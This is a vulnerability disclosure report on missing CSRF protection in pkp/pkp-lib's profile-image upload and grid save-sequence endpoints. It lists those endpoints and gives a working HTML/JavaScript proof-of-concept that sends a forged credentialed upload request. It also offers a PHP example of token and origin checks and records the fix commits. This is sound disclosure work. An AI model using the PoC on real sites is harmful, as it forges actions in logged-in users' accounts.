Cross-Site Request Forgery (CSRF) in pkp/pkp-lib

Valid

Reported on

Oct 16th 2021


Description

No CSRF token is required on the profile-image upload endpoint either: /index.php/e/$$$call$$$/tab/user/profile-tab/upload-profile-image.

More endpoints:

Reordering data:

/index.php/e/$$$call$$$/grid/settings/submission-checklist/submission-checklist-grid/save-sequence

/index.php/e/$$$call$$$/grid/settings/genre/genre-grid/save-sequence

PoC for the file-upload endpoint

<html>
  <body>
    <script>
        // Reporter's PoC: a cross-site multipart POST to the upload endpoint.
        // It succeeds only because the handler checks no CSRF token; the
        // browser attaches the victim's session cookie on its own.
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://10.0.2.15:8000/index.php/e/$$$call$$$/tab/user/profile-tab/upload-profile-image", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "de-de,de;q=0.8,en-us;q=0.5,en;q=0.3");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------moxieboundary1634260375680");
        xhr.withCredentials = true; // boolean, not the string "true"
        var body = "-----------------------------moxieboundary1634260375680\r\n" +
          "Content-Disposition: form-data; name=\"name\"\r\n" +
          "\r\n" + "cat.jpg" +
          "\r\n" +
          "-----------------------------moxieboundary1634260375680\r\n" +
          "Content-Disposition: form-data; name=\"uploadedFile\"; filename=\"cat.jpg\"\r\n" +
          "Content-Type: text/xml\r\n" +
          "\r\n" +
          "[FILE_CONTENT_HERE]" + "\r\n" +
          "-----------------------------moxieboundary1634260375680--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
    </script>
  </body>
</html>

Impact

This vulnerability lets an attacker trick a logged-in user into changing their own profile picture without their consent; the save-sequence endpoints listed above can be triggered the same way to reorder grid data.

Occurrences

no token in the upload profile frontend

no token in the upload profile backend

no token in save category grid sequence backend

no token in the save grid sequence backend
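As an added example (not pkp-lib's or the maintainer's code), here is a minimal server-side version of the check these handlers were missing, in plain PHP. It assumes a session array that holds the token under 'csrfToken', forms and XHRs that post it as a field of the same name, and a list of this site's allowed origins; the Origin/Referer check is defence in depth beyond the token check the fix commits add.

```php
<?php
// Added example, not pkp-lib's own code: the checks a handler such as
// upload-profile-image or save-sequence should run before changing state.
// Assumptions: the session holds the token under 'csrfToken', forms/XHRs
// post it as a field of the same name, $allowedOrigins lists this site's origin(s).
/** Issue one random token per session and reuse it for that session. */
function csrfToken(array &$session): string
{
    if (empty($session['csrfToken'])) {
        $session['csrfToken'] = bin2hex(random_bytes(32));
    }
    return $session['csrfToken'];
}
/** Synchronizer-token check: a missing, empty or mismatched token fails. */
function csrfTokenIsValid(array $post, array $session): bool
{
    $submitted = $post['csrfToken'] ?? null;
    $expected = $session['csrfToken'] ?? null;
    if (!is_string($submitted) || !is_string($expected) || $expected === '') {
        return false;
    }
    return hash_equals($expected, $submitted); // constant-time comparison
}
/** Defence in depth: browsers send Origin (or at least Referer) on cross-site
 *  POSTs, so a request from another site is refused even before the token check. */
function originIsAllowed(array $headers, array $allowedOrigins): bool
{
    $origin = $headers['Origin'] ?? null;
    if ($origin === null && isset($headers['Referer'])) {
        $p = parse_url($headers['Referer']);
        if (isset($p['scheme'], $p['host'])) {
            $origin = $p['scheme'] . '://' . $p['host'] . (isset($p['port']) ? ':' . $p['port'] : '');
        }
    }
    return $origin !== null && in_array($origin, $allowedOrigins, true); // no header at all: refuse
}
/** Returns null when the request may proceed, otherwise the reason to reject it. */
function rejectForgedRequest(array $post, array $headers, array $session, array $allowedOrigins): ?string
{
    if (!originIsAllowed($headers, $allowedOrigins)) {
        return 'Request origin not allowed';
    }
    if (!csrfTokenIsValid($post, $session)) {
        return 'CSRF token check failed';
    }
    return null;
}
```

The PoC above would be refused at the first check (its Origin is the attacker's page) and, if that were relaxed, at the second (no csrfToken field in the multipart body).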

We have contacted a member of the pkp/pkp-lib team and are waiting to hear back 2 months ago
haxatron modified their report 2 months ago
Alec Smecher validated this vulnerability 2 months ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
Alec Smecher confirmed that a fix has been merged on 169885 2 months ago
Alec Smecher has been awarded the fix bounty
Alec Smecher (Maintainer), 2 months ago:


Note that the two CSRF checks are added in separate commits; I flagged one of them as the fix. Both are:

  • https://github.com/pkp/pkp-lib/commit/169885a1de6554b519f264b213d91d4847d1a088
  • https://github.com/pkp/pkp-lib/commit/30180492367caf94919d870032795b201952d9e2